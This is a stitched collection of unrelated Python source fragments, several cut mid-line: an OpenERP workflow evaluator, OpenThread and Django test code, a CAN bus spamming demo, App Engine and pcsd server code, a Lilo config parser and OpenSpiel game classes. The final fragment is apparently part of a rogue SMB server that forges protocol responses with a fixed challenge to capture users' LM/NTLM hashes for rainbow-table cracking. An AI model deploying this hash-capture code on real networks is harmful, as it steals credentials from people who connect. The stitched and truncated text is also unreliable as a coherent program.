dir(self.obj)): res = self.obj.browse(self.cr, self.uid, self.ids[0]) return res[key]
el
se: return super(Env, self).__getitem__(key) def _eval_expr(cr, ident, workitem, action): ret=False assert action, 'You used a NULL action in a workflow, use dummy node instead.' for line in action.split('\n'): line = line.strip() uid=ident[0] model=ident[1] ids=[ident[2]] if line =='True': ret=True elif line =='False': ret=False else: env = Env(cr, uid, model, ids) ret = eval(line, env, nocopy=True) return ret def execute_action(cr, ident, workitem, activity): obj = pooler.get_pool(cr.dbname).get('ir.actions.server') ctx = {'active_model':ident[1], 'active_id':ident[2], 'active_ids':[ident[2]]} result = obj.run(cr, ident[0], [activity['action_id']], ctx) return result def execute(cr, ident, workitem, activity): return _eval_expr(cr, ident, workitem, activity['action']) def check(cr, workitem, ident, transition, signal): if transition['signal'] and signal != transition['signal']: return False uid = ident[0] if transition['group_id'] and uid != 1: pool = pooler.get_pool(cr.dbname) user_groups = pool.get('res.users').read(cr, uid, [uid], ['groups_id'])[0]['groups_id'] if not transition['group_id'] in user_groups: return False return _eval_expr(cr, ident, workitem, transition['condition']) # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
#!/usr/bin/env python # # Copyright (c) 2016, The OpenThread Authors. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # import time import unittest import node LEADER = 1 ROUTER = 2 ED1 = 3 SED1 = 4 class Cert_5_6_1_NetworkDataLeaderAsBr(unittest.TestCase): def setUp(self): self.nodes = {} for i in range(1,5): self.nodes[i] = node.Node(i) self.nodes[LEADER].set_panid(0xface) self.nodes[LEADER].set_mode('rsdn') self.nodes[LEADER].add_whitelist(self.nodes[ROUTER].get_addr64()) self.nodes[LEADER].enable_whitelist() self.nodes[ROUTER].set_panid(0xface) self.nodes[ROUTER].set_mode('rsdn') self.nodes[ROUTER].add_whitelist(self.nodes[LEADER].get_addr64()) self.nodes[ROUTER].add_whitelist(self.nodes[ED1].get_addr64()) self.nodes[ROUTER].add_whitelist(self.nodes[SED1].get_addr64()) self.nodes[ROUTER].enable_whitelist() self.nodes[ROUTER].set_router_selection_jitter(1) self.nodes[ED1].set_panid(0xface) self.nodes[ED1].set_mode('rsn') self.nodes[ED1].add_whitelist(self.nodes[ROUTER].get_addr64()) self.nodes[ED1].enable_whitelist() self.nodes[SED1].set_panid(0xface) self.nodes[SED1].set_mode('s') self.nodes[SED1].add_whitelist(self.nodes[ROUTER].get_addr64()) self.nodes[SED1].enable_whitelist() self.nodes[SED1].set_timeout(3) def tearDown(self): for node in list(self.nodes.values()): node.stop() del self.nodes def test(self): self.nodes[LEADER].start() self.nodes[LEADER].set_state('leader') self.assertEqual(self.nodes[LEADER].get_state(), 'leader') self.node
s[LEADER].add_prefix(
'2001:2:0:1::/64', 'paros') self.nodes[LEADER].add_prefix('2001:2:0:2::/64', 'paro') self.nodes[LEADER].register_netdata() self.nodes[ROUTER].start() time.sleep(5) self.assertEqual(self.nodes[ROUTER].get_state(), 'router') self.nodes[ED1].start() time.sleep(5) self.assertEqual(self.nodes[ED1].get_state(), 'child') self.nodes[SED1].start() time.sleep(5) self.assertEqual(self.nodes[SED1].get_state(), 'child') addrs = self.nodes[ED1].get_addrs() self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs)) self.assertTrue(any('2001:2:0:2' in addr[0:10] for addr in addrs)) for addr in addrs: if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2': self.assertTrue(self.nodes[LEADER].ping(addr)) addrs = self.nodes[SED1].get_addrs() self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs)) self.assertFalse(any('2001:2:0:2' in addr[0:10] for addr in addrs)) for addr in addrs: if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2': self.assertTrue(self.nodes[LEADER].ping(addr)) if __name__ == '__main__': unittest.main()
""" This demo creates multiple processes of Producers to spam a socketcan bus. """ i
mport time import logging import concurrent.futures import can can.rc['interface'] = 'socketcan_native' from can.interfaces.interface import Bus can_interface = 'vca
n0' def producer(id): """:param id: Spam the bus with messages including the data id.""" bus = Bus(can_interface) for i in range(16): msg = can.Message(arbitration_id=0x0cf02200, data=[id, i, 0, 1, 3, 1, 4, 1]) bus.send(msg) # TODO Issue #3: Need to keep running to ensure the writing threads stay alive. ? time.sleep(2) if __name__ == "__main__": #logging.getLogger('').setLevel(logging.DEBUG) with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor: executor.map(producer, range(5)) time.sleep(2)
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2017 Didotech SRL import logging from openerp.osv import fields, orm import tools from openerp import addons _logger = logging.getLogger(__name__) _logger.setLevel(logging.DEBUG) class res_users(orm.Model): _inherit = "res.users" def _get_photo(self, cr, uid, context=None): photo_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png') return open(photo_path, 'rb').read().encode('base64') def _get_image(self, cr, uid, ids, name, args, context=None): result = dict.fromkeys(ids, False) for obj in self.browse(cr, uid, ids, context=context): result[obj.id] = tools.image_get_resized_images(obj.image) return result def _set_image(self, cr, uid, id, name, value, args, context=None): return self.write(cr, uid, [id], {'image': tools.image_resize_image_big(value)}, context=context) def _has_image(self, cr, uid, ids, name, args, context=None): result = {} for obj in self.browse(cr, uid, ids, context=context): result[obj.id] = obj.image or False return result def _get_default_image(self, cr, uid, context=None): image_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png') return tools.i
mage_resize_image_b
ig(open(image_path, 'rb').read().encode('base64')) _columns = { 'image': fields.binary("Image", help="This field holds the image used as avatar for this contact, limited to 1024x1024px"), 'image_medium': fields.function(_get_image, fnct_inv=_set_image, string="Medium-sized image", type="binary", multi="_get_image", store={ 'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10), }, help="Medium-sized image of this contact. It is automatically "\ "resized as a 128x128px image, with aspect ratio preserved. "\ "Use this field in form views or some kanban views."), 'image_small': fields.function(_get_image, fnct_inv=_set_image, string="Small-sized image", type="binary", multi="_get_image", store={ 'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10), }, help="Small-sized image of this contact. It is automatically "\ "resized as a 64x64px image, with aspect ratio preserved. "\ "Use this field anywhere a small image is required."), 'has_image': fields.function(_has_image, type="boolean"), } _defaults = { 'image': lambda self, cr, uid, ctx={}: self._get_default_image(cr, uid, ctx), } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
""".""" def get_systeminfo(resource, config, interactive=False):
""".""" ret
urn {'ohai': 'there!'}
from abc import ABCMeta, abstractmethod class Parent(
object): __metaclass__ = ABCMeta
@abstractmethod def my_method2(self): pass @abstractmethod def my_method(self, foo): pass
import os, sys from functools import partial if 'DJANGO_SETTINGS_MODULE' not in os.environ: sys.path.append('.') os.environ['DJANGO_SETTINGS_MODULE'] = 'settings' from django.conf import settings from django.test.client import Client from django.test.utils import setup_test_environment, teardown_test_environment from django.core.management import call_command from django.core import mail from django.contrib.auth.models import User def pytest_funcarg__django_client(request): '''py.test funcargs are awesome. This ugly function basically creates a test environment with an empty database every time you write a test function that accepts an argument named 'django_client.' Most of the time you won't use this, you'll use the 'client' funcarg below instead. This funcarg is only reset once per test session. The 'client' funcarg empties the database after each test to ensure a clean slate.''' try: old_name = settings.DATABASES['default']['NAME'] except AttributeError: # try older settings format old_name = settings.DATABASE_NAME def setup(): setup_test_environment() if not hasattr(settings, 'DEBUG'): settings.DEBUG = False if 'south' in settings.INSTALLED_APPS: from south.management.commands import patch_for_test_db_setup patch_for_test_db_setup() from django.db import connection connection.creation.create_test_db(1, True) return Client() def teardown(client): teardown_test_environment() from django.db import connection connection.creation.destroy_test_db(old_name, 1) return request.cached_setup(setup, teardown, "session") def pytest_funcarg__client(request): '''Creates a test environment using the 'django_client' funcarg above, but also ensures the database is flushed after running each test.''' def setup(): return request.getfuncargvalue('django_client') def teardown(client): call_command('flush', verbosity=0, interactive=False) mail.outbox = [] return request.cached_setup(setup, teardown, "function") def user_creator(name, email, **extra): '''Creates a user.''' # Note: I make test usernames and passwords identical for easy login user = User.objects.create_user(username=name, password=name, email=email) for attr, value in extra.iteritems(): setattr(user, attr, value) user.save() return user def pytest_funcarg__user(request): '''Create a user with no special permissions
.''' return request.cached_setup(partial(user_creator, "user", "user@example.com"), lambda user: user.delete(), "session") def pytest_funcarg__admin(request): '''Create an admin user with all permissions.''' return request.cached_setup(partial(user_creator, "admin",
"admin@example.com", is_superuser=True, is_staff=True), lambda user: user.delete(), "session")
default=False) parser.add_argument('--high_replication', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--require_indexes', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--clear_datastore', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--logs_path', default=None) parser.add_argument('--enable_sendmail', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--smtp_host', default='') parser.add_argument('--smtp_port', default=25, type=int) parser.add_argument('--smtp_user', default='') parser.add_argument('--smtp_password', default='') parser.add_argument('--show_mail_body', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--smtp_allow_tls', action=boolean_action.BooleanAction, const=True, default=True) parser.add_argument('--prospective_search_path', default=None) parser.add_argument('--clear_prospective_search', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--enable_task_running', action=boolean_action.BooleanAction, const=True, default=True) parser.add_argument('--task_retry_seconds', default=30, type=int) parser.add_argument('--user_login_url', default=None) parser.add_argument('--user_logout_url', default=None) return parser.parse_args(args) class APIServerProcess(object): """Manages an API Server running as a seperate process.""" def __init__(self, executable, host, port, app_id, script=None, appidentity_email_address=None, appidentity_private_key_path=None, application_host=None, application_port=None, application_root=None, auto_id_policy=None, blobstore_path=None, clear_datastore=None, clear_prospective_search=None, datastore_path=None, enable_sendmail=None, enable_task_running=None, high_replication=None, logs_path=None, prospective_search_path=None, require_indexes=None, show_mail_body=None, smtp_host=None, smtp_password=None, smtp_port=None, smtp_user=None, smtp_allow_tls=None, task_retry_seconds=None, trusted=None, use_sqlite=None, default_gcs_bucket_name=None): """Configures the APIs hosted by this server. Args: executable: The path of the executable to use when running the API Server e.g. "/usr/bin/python". host: The host name that should be used by the API Server e.g. "localhost". port: The port number that should be used by the API Server e.g. 8080. app_id: The str application id e.g. "guestbook". script: The name of the script that should be used, along with the executable argument, to run the API Server e.g. "api_server.py". If None then the executable is run without a script argument. appidentity_email_address: Email address for service account substitute. appidentity_private_key_path: Private key for service account substitute. application_host: The name of the host where the development application server is running e.g. "localhost". application_port: The port where the application server is running e.g. 8000. application_root: The path to the directory containing the user's application e.g. "/home/bquinlan/myapp". auto_id_policy: One of "sequential" or "scattered", indicating whether the Datastore stub should assign IDs sequentially or scattered. blobstore_path: The path to the file that should be used for blobstore storage. clear_datastore: Clears the file at datastore_path, emptying the datastore from previous runs. clear_prospective_search: Clears the file at prospective_search_path, emptying the perspective search state from previous runs. datastore_path: The path to the file that should be used for datastore storage. enable_sendmail: A bool indicating if sendmail should be used when sending e-mails. This argument is ignored if mail_smtp_host is not None. enable_task_running: A bool indicating whether taskqueue tasks should be run automatically or it the must be manually triggered. high_replication: A bool indicating whether to use the high replication consistency model. logs_path: Path to the file to store the logs data in. prospective_search_path: The path to the file that should be used to save prospective search subscriptions. require_indexes: A bool indicating if the same production datastore indexes requirements should be enforced i.e. if True then a google.appengine.ext.db.NeedIndexError will be be raised if a query is executed without the required indexes. show_mail_body: A bool indicating whether the body of sent e-mails should be written to the logs. smtp_host: The SMTP hostname that should be used when sending e-mails. If None then the enable_sendmail argument is considered. smtp_password: The password to use when authenticating with the
SMTP server. This v
alue may be None if smtp_host or smtp_user is also None. smtp_port: The SMTP port number that should be used when sending e-mails. If this value is None then smtp_host must also be None. smtp_user: The username to use when authenticating with the SMTP server. This value may be None if smtp_host is also None or if the SMTP server does not require authentication. smtp_allow_tls: A bool indicating whether to enable TLS. task_retry_seconds: An int representing the number of seconds to wait before a retrying a failed taskqueue task. trusted: A bool indicating if privileged APIs should be made available. use_sqlite: A bool indicating whether DatastoreSqliteStub or DatastoreFileStub should be used. default_gcs_bucket_name: A str overriding the normal default bucket name. """ self._process = None self._host = host self._port = port if script: self._args = [executable, script] else: self._args = [executable] self._BindArgument('--api_host', host) self._BindArgument('--api_port', port) self._BindArgument('--appidentity_email_address', appidentity_email_address) self._BindArgument('--appidentity_private_key_path', appidentity_private_key_path) self._BindArgument('--application_host', application_host) self._BindArgument('--application_port', application_port) self._BindArgument('--application_root', application_root) self._BindArgument('--application', app_id) self._BindArgument('--auto_id_policy', auto_id_policy) self._BindArgument('--blobstore_path', blobstore_path) self._BindArgument('--clear_datastore', clear_datastore) self._BindArgument('--clear_prospective_search', clear_prospective_search) self._BindArgument('--datastore_path', datastore_path) self._BindArgument('--enable_sendmail', enable_sendmail) self._BindArgument('--enable_task_running', enable_task_running) self._BindArgument('--high_replication', high_replicati
import os import signal import socket from pathlib import Path from tornado.ioloop import IOLoop from tornado.locks import Lock from tornado.web import Application from pcs import settings from pcs.daemon import log, ruby_pcsd, session, ssl, systemd from pcs.daemon.app import sinatra_ui, sinatra_remote, ui from pcs.daemon.app.common import RedirectHandler from pcs.daemon.env import prepare_env from pcs.daemon.http_server import HttpsServerManage class SignalInfo: # pylint: disable=too-few-public-methods server_manage = None ioloop_started = False def handle_signal(incomming_signal, frame): # pylint: disable=unused-argument log.pcsd.warning("Caught signal: %s, shutting down", incomming_signal) if SignalInfo.server_manage: SignalInfo.server_manage.stop() if SignalInfo.ioloop_started: IOLoop.current().stop() raise SystemExit(0) def sign_ioloop_started(): SignalInfo.ioloop_started = True def config_sync(sync_config_lock: Lock, ruby_pcsd_wrapper: ruby_pcsd.Wrapper): async def config_synchronization(): async with sync_config_lock: next_run_time = await ruby_pcsd_wrapper.sync_configs() IOLoop.current().call_at(next_run_time, config_synchronization) return config_synchronization def configure_app( session_storage: session.Storage, ruby_pcsd_wrapper: ruby_pcsd.Wrapper, sync_config_lock: Lock, public_dir, di
sable_gui=False, debug=False, ): def make_app(https_server_manage: HttpsServerManage): """ https_server_manage -- allows to controll the server (specifically reload its SSL certific
ates). A relevant handler should get this object via the method `initialize`. """ routes = sinatra_remote.get_routes( ruby_pcsd_wrapper, sync_config_lock, https_server_manage, ) if not disable_gui: routes.extend( # old web ui by default [(r"/", RedirectHandler, dict(url="/manage"))] + [(r"/ui", RedirectHandler, dict(url="/ui/"))] + ui.get_routes( url_prefix="/ui/", app_dir=os.path.join(public_dir, "ui"), fallback_page_path=os.path.join( public_dir, "ui_instructions.html", ), session_storage=session_storage, ) + sinatra_ui.get_routes( session_storage, ruby_pcsd_wrapper, public_dir ) ) return Application(routes, debug=debug) return make_app def main(): signal.signal(signal.SIGTERM, handle_signal) signal.signal(signal.SIGINT, handle_signal) Path(settings.pcsd_log_location).touch(mode=0o600, exist_ok=True) log.setup(settings.pcsd_log_location) env = prepare_env(os.environ, log.pcsd) if env.has_errors: raise SystemExit(1) if env.PCSD_DEBUG: log.enable_debug() sync_config_lock = Lock() ruby_pcsd_wrapper = ruby_pcsd.Wrapper( settings.pcsd_ruby_socket, debug=env.PCSD_DEBUG, ) make_app = configure_app( session.Storage(env.PCSD_SESSION_LIFETIME), ruby_pcsd_wrapper, sync_config_lock, env.PCSD_STATIC_FILES_DIR, disable_gui=env.PCSD_DISABLE_GUI, debug=env.PCSD_DEV, ) pcsd_ssl = ssl.PcsdSSL( server_name=socket.gethostname(), cert_location=settings.pcsd_cert_location, key_location=settings.pcsd_key_location, ssl_options=env.PCSD_SSL_OPTIONS, ssl_ciphers=env.PCSD_SSL_CIPHERS, ) try: SignalInfo.server_manage = HttpsServerManage( make_app, port=env.PCSD_PORT, bind_addresses=env.PCSD_BIND_ADDR, ssl=pcsd_ssl, ).start() except socket.gaierror as e: log.pcsd.error( "Unable to bind to specific address(es), exiting: %s ", e ) raise SystemExit(1) from e except OSError as e: log.pcsd.error("Unable to start pcsd daemon, exiting: %s ", e) raise SystemExit(1) from e except ssl.SSLCertKeyException as e: for error in e.args: log.pcsd.error(error) log.pcsd.error("Invalid SSL certificate and/or key, exiting") raise SystemExit(1) from e ioloop = IOLoop.current() ioloop.add_callback(sign_ioloop_started) if systemd.is_systemd() and env.NOTIFY_SOCKET: ioloop.add_callback(systemd.notify, env.NOTIFY_SOCKET) ioloop.add_callback(config_sync(sync_config_lock, ruby_pcsd_wrapper)) ioloop.start()
#!/usr/bin/env python ''' ******************************************************************************* Description: This tool can help you determine the character encoding of a text file by converting one line from the file to every(?) possible character encoding. It writes the converted lines to a new text file using the same filename but appending the extension '.encodings' to it. You have to examine this file visually to find the correct encoding. Usage : test_encodings.py filename [number of line to test] Licence : Public Domain. Author : Antonios Tsolis (2016) *****************
********************************************
****************** ''' import io import os import sys from encodings.aliases import aliases encs = { "ascii", "big5", "big5hkscs", "cp037", "cp424", "cp437", "cp500", "cp720", "cp737", "cp775", "cp850", "cp852", "cp855", "cp856", "cp857", "cp858", "cp860", "cp861", "cp862", "cp863", "cp864", "cp865", "cp866", "cp869", "cp874", "cp875", "cp932", "cp949", "cp950", "cp1006", "cp1026", "cp1140", "cp1250", "cp1251", "cp1252", "cp1253", "cp1254", "cp1255", "cp1256", "cp1257", "cp1258", "euc_jp", "euc_jis_2004", "euc_jisx0213", "euc_kr", "gb2312", "gbk", "gb18030", "hz", "iso2022_jp", "iso2022_jp_1", "iso2022_jp_2", "iso2022_jp_2004", "iso2022_jp_3", "iso2022_jp_ext", "iso2022_kr", "latin_1", "iso8859_2", "iso8859_3", "iso8859_4", "iso8859_5", "iso8859_6", "iso8859_7", "iso8859_8", "iso8859_9", "iso8859_10", "iso8859_13", "iso8859_14", "iso8859_15", "iso8859_16", "johab", "koi8_r", "koi8_u", "mac_cyrillic", "mac_greek", "mac_iceland", "mac_latin2", "mac_roman", "mac_turkish", "ptcp154", "shift_jis", "shift_jis_2004", "shift_jisx0213", "utf_32", "utf_32_be", "utf_32_le", "utf_16", "utf_16_be", "utf_16_le", "utf_7", "utf_8", "utf_8_sig", "idna", "mbcs", "palmos", "punycode", "rot_13", "raw_unicode_escape", "unicode_escape", "unicode_internal", "base64_codec", "bz2_codec", "hex_codec", "uu_codec", "zlib_codec" } def write_encodings(filename, line_number, final_encoding): # To ensure that we cover as many as possible encodings, # we take the union between our predefined encoding set and the # set of the values from the encodings.aliases.aliases. encodings = encs.union(set(aliases.values())) data = dict() # Read line from file try: with io.open(filename, "rb") as f: lines = f.readlines() line = lines[line_number-1] print("\nProcessing line number: " + str(line_number)) if len(line) < 3: print("!!!Warning!!!: Possible empty line.") print("") except Exception: _, err, _ = sys.exc_info() print("Error reading " + filename) print(err) sys.exit(1) # Decode it using every possible encoding for enc in encodings: try: data[enc] = line.decode(enc) except Exception: _, err, _ = sys.exc_info() print("Cannot decode using " + enc) # print(err) # We write the results in a new utf-8 text file # We use the same filename + an '.encodings' extension fpath = os.path.abspath(filename) newfilename = fpath + '.encodings' print("\nWriting successfully tested encodings in " + newfilename) with open(newfilename, 'w') as out: c = 0 for enc in sorted(data.keys()): try: out.write("%-20s" % enc) if (sys.version_info[0] < 3): line = data[enc].encode(final_encoding) else: line = data[enc] out.write(line) out.write(os.linesep) c += 1 except Exception: _, err, _ = sys.exc_info() print("Cannot encode " + enc + " to " + final_encoding) # print(err) print("\n" + str(c) + " out of " + str(len(encodings)) + " tested encodings were written.\n") if __name__ == '__main__': nargs = len(sys.argv)-1 if nargs < 1 or nargs > 2: exit("Usage: test_encodings.py filename [number of line to test]") if nargs == 2: line_number = int(sys.argv[2]) else: line_number = 1 write_encodings(sys.argv[1], line_number, 'utf_8')
# #LiloConf.py # import sys, re, os import logging import GrubConf class LiloImage(object): def __init__(self, lines, path): self.reset(lines, path) def __repr__(self): return ("title: %s\n" " root: %s\n" " kernel: %s\n" " args: %s\n" " initrd: %s\n" %(self.title, self.root, self.kernel, self.args, self.initrd)) def reset(self, lines, path): self._initrd = self._kernel = self._readonly = None self._args = "" self.title = "" self.lines = [] self.path = path self.root = "" map(self.set_from_line, lines) def set_from_line(self, line, replace = None): (com, arg) = GrubConf.grub_exact_split(line, 2) if self.commands.has_key(com): if self.commands[com] is not None: setattr(self, self.commands[com], re.sub('^"(.+)"$', r"\1", arg.strip())) else: logging.info("Ignored image directive %s" %(com,)) else: logging.warning("Unknown image directive %s" %(com,)) # now put the line in the list of lines if replace is None: self.lines.append(line) e
lse: self.lines.pop(replace) self.lines.insert(replace, line) def set_kernel(self, val): self._kernel = (None, self.path + "/" + val) def get_kernel(self):
return self._kernel kernel = property(get_kernel, set_kernel) def set_initrd(self, val): self._initrd = (None, self.path + "/" + val) def get_initrd(self): return self._initrd initrd = property(get_initrd, set_initrd) def set_args(self, val): self._args = val def get_args(self): args = self._args if self.root: args += " root=" + self.root if self.readonly: args += " ro" return args args = property(get_args, set_args) def set_readonly(self, val): self._readonly = 1 def get_readonly(self): return self._readonly readonly = property(get_readonly, set_readonly) # set up command handlers commands = { "label": "title", "root": "root", "rootnoverify": "root", "image": "kernel", "initrd": "initrd", "append": "args", "read-only": "readonly", "chainloader": None, "module": None} class LiloConfigFile(object): def __init__(self, fn = None): self.filename = fn self.images = [] self.timeout = -1 self._default = 0 if fn is not None: self.parse() def parse(self, buf = None): if buf is None: if self.filename is None: raise ValueError, "No config file defined to parse!" f = open(self.filename, 'r') lines = f.readlines() f.close() else: lines = buf.split("\n") path = os.path.dirname(self.filename) img = [] for l in lines: l = l.strip() # skip blank lines if len(l) == 0: continue # skip comments if l.startswith('#'): continue # new image if l.startswith("image"): if len(img) > 0: self.add_image(LiloImage(img, path)) img = [l] continue if len(img) > 0: img.append(l) continue (com, arg) = GrubConf.grub_exact_split(l, 2) if self.commands.has_key(com): if self.commands[com] is not None: setattr(self, self.commands[com], arg.strip()) else: logging.info("Ignored directive %s" %(com,)) else: logging.warning("Unknown directive %s" %(com,)) if len(img) > 0: self.add_image(LiloImage(img, path)) def add_image(self, image): self.images.append(image) def _get_default(self): for i in range(0, len(self.images) - 1): if self.images[i].title == self._default: return i return 0 def _set_default(self, val): self._default = val default = property(_get_default, _set_default) commands = { "default": "self.default", "timeout": "self.timeout", "prompt": None, "relocatable": None, } if __name__ == "__main__": if sys.argv < 2: raise RuntimeError, "Need a grub.conf to read" g = LiloConfigFile(sys.argv[1]) for i in g.images: print i #, i.title, i.root, i.kernel, i.args, i.initrd print g.default
# Copyright 2019 DeepMind Technologies Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Big tensor games.""" from absl import logging # pylint:disable=unused-import import numpy as np from open_spiel.python.algorithms.adidas_utils.helpers import misc class TensorGame(object): """Tensor Game.""" def __init__(self, pt, seed=None): """Ctor. Inits payoff tensor (players x actions x ... np.array). Args: pt: payoff tensor, np.array seed: seed for random number generator, used if computing best responses """ if np.any(pt < 0.): raise ValueError("Payoff tensor must contain non-negative values") self.pt = pt self.seed = seed self.random = np.random.RandomState(seed) def num_players(self): return self.pt.shape[0] def num_strategies(self): return self.pt.shape[1:] def payoff_tensor(self): return self.pt def get_payoffs_for_strategies(self, policies): """Return vector of payoffs for all players given list of strategies. Args: policies: list of integers indexing strategies for each player Returns: np.array (length num players) of payoffs """ return self.pt[tuple([slice(None)] + policies)] def best_response(self, mixed_strategy, return_exp=False): """Return best response and its superiority over the current strategy. Args: mixed_strategy: np.ndarray (distribution over strategies) return_exp: bool, whethe
r to return how much best response exploits the given
mixed strategy (default is False) Returns: br: int, index of strategy (ties split randomly) exp: u(br) - u(mixed_strategy) """ logging.warn("Assumes symmetric game! Returns br for player 0.") gradient = misc.pt_reduce(self.pt[0], [mixed_strategy] * self.num_players(), [0]) br = misc.argmax(self.random, gradient) exp = gradient.max() - gradient.dot(mixed_strategy) if return_exp: return br, exp else: return br def best_population_response(self, dist, policies): """Returns the best response to the current population of policies. Args: dist: np.ndarray, distribution over policies policies: list of integers indexing strategies for each player Returns: best response, exploitability tuple (see best_response) """ ns = self.num_strategies() mixed_strat = np.zeros(ns) for pure_strat, prob in zip(policies, dist): mixed_strat[pure_strat] += prob return self.best_response(mixed_strat) class ElFarol(TensorGame): """N-Player, 2-Action symmetric game with unique symmetric Nash.""" def __init__(self, n=2, c=0.5, B=0, S=1, G=2, seed=None): """Ctor. Initializes payoff tensor (N x (2,) * N np.array). See Section 3.1, The El Farol Stage Game in http://www.econ.ed.ac.uk/papers/id186_esedps.pdf action 0: go to bar action 1: avoid bar Args: n: int, number of players c: float, threshold for `crowded' as a fraction of number of players B: float, payoff for going to a crowded bar S: float, payoff for staying at home G: float, payoff for going to an uncrowded bar seed: seed for random number generator, used if computing best responses """ assert G > S > B, "Game parameters must satisfy G > S > B." pt = np.zeros((n,) + (2,) * n) for idx in np.ndindex(pt.shape): p = idx[0] a = idx[1:] a_i = a[p] go_to_bar = (a_i < 1) crowded = (n - 1 - sum(a) + a_i) >= (c * n) if go_to_bar and not crowded: pt[idx] = G elif go_to_bar and crowded: pt[idx] = B else: pt[idx] = S super().__init__(pt, seed)
1122334455667788, for which plenty of generated rainbow tables exist already. """ # parse NTLM/LM hashes # scapy has very limited SMB packet support, so we have to do this manually def parse_credentials(self, data): # offsets based on security blob starting at data[59] data = data[59:] lm_offset = struct.unpack('<I', data[16:20])[0] ntlm_offset = struct.unpack('<I', data[24:28])[0] name_length = struct.unpack('<h', data[36:38])[0] name_offset = struct.unpack('<I', data[40:44])[0] host_length = struct.unpack('<h', data[46:48])[0] host_offset = struct.unpack('<I', data[48:52])[0] lm_hash = ntlm_hash = '' # LM hash for i in data[lm_offset:lm_offset + 24]: tmp = str(hex(ord(i))).replace('0x', '') if len(tmp) is 1: # hex() removes leading 0's in hex; we need them. tmp = '0' + tmp lm_hash += tmp # NTLM hash for i in data[ntlm_offset:ntlm_offset + 24]: tmp = str(hex(ord(i))).replace('0x', '') if len(tmp) is 1: tmp = '0' + tmp ntlm_hash += tmp # host name hname = '' for i in range(host_offset, (host_offset + host_length)): tmp = struct.unpack('<c', data[i])[0] if tmp is '\x00': continue hname += tmp if name_length > 100: # sanity return # user name uname = '' for i in range(name_offset, (name_offset + name_length)): tmp = struct.unpack('<c', data[i])[0] if tmp is '\x00': # null bytes continue uname += tmp # add the username and build the list # list consists of # HOST NAME # LM HASH # NTLM HASH if not uname in self.captured_hashes: tmp = [hname, lm_hash.upper(), ntlm_hash.upper()] self.captured_hashes[uname] = tmp data = 'Username: %s\nHost: %s\nLM: %s\nNTLM: %s\nChallenge: %s\n' \ % (uname, hname, lm_hash.upper(), ntlm_hash.upper(), '1122334455667788') self.log_msg(data) # get packet payload def get_payload(self, data): hexcode = str(hex(ord(data[4]))) if hexcode == '0x72': # Build the payload for a Negotiate Protocol Response # netbios payload = "\x00\x00\x00\x55" # smb header payload += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8" payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" payload += "\xff\xff\xff\xfe\x00\x00\x00\x00" # negotiate protocol response payload += "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00" payload += "\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x80" payload += "\x11\xb9\x14\xe4\x77\xc8\xcd\x01\x68\x01\x00\x10" payload += "\x00\xb5\x9b\x73\x9d\xb7\xc2\xb7\x40\x83\xd6\x52" payload += "\x31\xec\xb3\x84\x53" return (payload, 0) elif hexcode == '0x73': # check if its a NEGOTIATE or AUTH message_type = str(hex(ord(data[67]))) if message_type == '0x1': # Build the payload for a NTLMSSP_CHALLENGE # netbios payload = "\x00\x00\x00\xdd" # smb header payload += "\xff\x53\x4d\x42\x73\x16" payload += "\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00" payload += "\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" payload += "\x00\x08\x10\x00" # session setup andx response, error more processing payload += 